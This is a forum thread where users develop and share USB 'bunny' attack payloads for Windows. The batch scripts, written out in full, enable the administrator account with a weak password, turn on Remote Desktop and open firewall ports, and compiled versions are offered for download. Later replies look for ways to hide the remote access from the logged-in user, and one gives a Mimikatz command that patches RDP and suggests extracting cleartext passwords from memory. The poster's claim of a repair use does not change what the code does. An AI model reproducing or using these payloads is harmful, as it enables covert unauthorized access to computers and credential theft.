Jump to content

enable admin & rdp payload (Completed)


Vert

Recommended Posts

the idea is the enable the admin account and rdp and open the ports required so far i have come up with this.

batch file this following script

net user administrator /active:yes
net user administrator
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
sc config TermService start= auto
net start Termservice
netsh firewall set service RemoteDesktop enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
exit

then compile it as a exe so it can be run as admin from the bunny.

ive also made a script to disable everything also.

net user administrator /active:no
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
sc config TermService start= auto
netsh stop Termservice
netsh firewall set service RemoteDesktop disable
netsh advfirewall firewall set rule group="remote desktop" new enable=no
exit

i would note that this is just an idea and completely untested the final step would simply having the bunny run the exe files.

i was also thinking it would be a good idea to dump the systems internal and external IP for later use.

maybe someone wants to step in and complete this half finished payload or add to it.

Edited by Vert
update
Link to comment
Share on other sites

...

Stole my idea. Well, mostly-ish.

My idea was to use powershell to enable RDP and then host a hotspot, so you could access the PC from away the PC and control it remotely. Be nice to be able to control it without a user (if there is one) seeing (separate user being used in the background that you can't see).

Link to comment
Share on other sites

I'm in the later stages of testing the payload now as is it enables the admin account puts a password of 1234 on it and enables rdp script to enable and disable it all I'm in the last stage of getting the payload to run as admin.

#RDPADMIN

disable.bat

enable.bat

-------------------------------------------------------------------------------------

#ADMINENABLE

figured id add another bat this one simply enables the admin account with password 1234 switch yes to no to disable again.

admin.bat

--------------------------------------------------------------------------------------

Edited by Vert
update
Link to comment
Share on other sites

Presenting 3 new bunny payloads:

Admin:enables admin account with password 1234

Adminrdp:enables admin with pass 1234 & RDP + Ports

UNadminrdp:disables admin account & RDP + Ports

UNadminrdp.rar

Adminrdp.rar

Admin.rar

I take no credit for these i only mashed it all together and tested it.

my intended use for these was purely for making system repairs easier and take no responsibility for how they may be used.

Edited by Vert
Link to comment
Share on other sites

39 minutes ago, Vert said:

Presenting 3 new bunny payloads:

Admin:enables admin account with password 1234

Adminrdp:enables admin with pass 1234 & RDP + Ports

UNadminrdp:disables admin account & RDP + Ports

UNadminrdp.rar

Adminrdp.rar

Admin.rar

I take no credit for these i only mashed it all together and tested it.

my intended use for these was purely for making system repairs easier and take no responsibility for how they may be used.

I'll take a look at this. :)

Link to comment
Share on other sites

The bat files posted above are the exact same as the compiled .exes in the final result so if you would rather compile the bats your self your welcome to do so. It might even be possible to use the bat files rather then the .exes with some changes to the payload but i did not test any of the payloads in this way.

Edited by Vert
Link to comment
Share on other sites

when you connect over rdp it pops a 30 sec window saying ok or cancel that another user is logging in it isn't very sneaky the way this is setup. if someone knows a better sneakier method it could be interesting as i noted my intent was legit usage for system repairs. my testing was performed on 2 windows 10 pro systems but i did add some older commands that should work with older versions of windows as far back as xp they remain untested.

Edited by Vert
Link to comment
Share on other sites

4 minutes ago, Vert said:

when you connect over rdp it pops a 30 sec window saying ok or cancel that another user is logging in it isn't very sneaky the way this is setup. if someone knows a better sneakier method it could be interesting as i noted my intent was legit usage for system repairs.

Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. :grin:

 

I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked. 

Link to comment
Share on other sites

the bunny is just automation tool it isn't good nor evil by it self its how you use it much like a hammer most use it for putting in nails but others have been known to cave in skulls with it the person using a tool is its master the tool is useless with out you to control it.

Edited by Vert
Link to comment
Share on other sites

You could potentially put third-party remote-desktop software on the PC and then tell the PC to run it in the background, then you can connect to it via a phone or laptop elsewhere (via the PC's hotspot or over the internet) using an app on your side.

Link to comment
Share on other sites

3 hours ago, Vert said:

when you connect over rdp it pops a 30 sec window saying ok or cancel that another user is logging in it isn't very sneaky the way this is setup. if someone knows a better sneakier method it could be interesting as i noted my intent was legit usage for system repairs. my testing was performed on 2 windows 10 pro systems but i did add some older commands that should work with older versions of windows as far back as xp they remain untested.

Vert,

Mimikatz can patch RDP services in real time to allow multi users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar.

Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'

Link to comment
Share on other sites

3 minutes ago, redteamwynns said:

Vert,

Mimikatz can patch RDP services in real time to allow multi users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar.

Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'

sounds interesting and i welcome others to improve on what i started it seems like a good jumping off point / proof of concept.

Edited by Vert
Link to comment
Share on other sites

1 hour ago, redteamwynns said:

Vert,

Mimikatz can patch RDP services in real time to allow multi users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract users cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar.

Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'

It does sound interesting. I'll look into that.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...